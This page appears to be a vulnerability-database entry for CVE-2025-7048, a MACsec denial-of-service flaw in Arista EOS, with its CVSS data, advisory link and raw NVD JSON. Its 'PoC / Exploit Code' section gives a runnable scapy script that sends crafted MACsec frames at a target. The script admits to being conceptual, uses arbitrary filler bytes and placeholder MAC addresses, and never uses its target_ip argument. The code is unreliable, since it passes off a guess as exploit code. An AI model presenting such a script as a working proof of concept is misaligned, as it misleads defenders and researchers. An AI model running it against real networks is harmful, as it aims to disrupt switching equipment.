Security Vulnerability Report
CVE-2025-7048 CVSS 4.3 MEDIUM

CVE-2025-7048

Published: 2026-01-06 20:16:01
Last Modified: 2026-04-15 00:35:42

Description

On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Arista EOS (for specific versions, consult the official security advisory)
Arista platforms running a MACsec configuration

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-7048 PoC - Arista EOS MACsec DoS
# This PoC demonstrates sending a crafted packet to trigger MACsec process termination
# Note: Use only for authorized security testing
from scapy.all import Ether, Raw, sendp


def create_crafted_macsec_packet():
    """
    Create a specially crafted packet to trigger MACsec process termination
    This is a conceptual PoC - actual packet structure may vary
    """
    # Construct Ethernet frame with MACsec EtherType
    # Common MACsec EtherTypes: 0x88E5 (IEEE 802.1AE)
    packet = Ether(dst="00:1c:73:xx:xx:xx", src="00:1c:73:yy:yy:yy", type=0x88E5)
    # Add malformed MACsec Secure Channel identifier
    # This may trigger the vulnerability in MACsec process
    packet = packet / Raw(load=b"\x00" * 32 + b"\xFF" * 16)
    return packet


def send_crafted_packet(target_ip, interface="eth0"):
    """
    Send the crafted packet to target device
    """
    packet = create_crafted_macsec_packet()
    print(f"[*] Sending crafted MACsec packet to {target_ip}")
    sendp(packet, iface=interface, verbose=1)
    print("[*] Packet sent - check if MACsec process is affected")


if __name__ == "__main__":
    import sys

    if len(sys.argv) < 2:
        print("Usage: python cve_2025_7048_poc.py <target_ip> [interface]")
        sys.exit(1)
    target = sys.argv[1]
    iface = sys.argv[2] if len(sys.argv) > 2 else "eth0"
    send_crafted_packet(target, iface)

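References

https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132
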
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-7048", "sourceIdentifier": "[email protected]", "published": "2026-01-06T20:16:01.253", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "On affected platforms running Arista EOS with MACsec configuration, a specially crafted packet can cause the MACsec process to terminate unexpectedly. Continuous receipt of these packets with certain MACsec configurations can cause longer term disruption of dataplane traffic."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-805"}]}], "references": [{"url": "https://www.arista.com/en/support/advisories-notices/security-advisory/23120-security-advisory-0132", "source": "[email protected]"}]}}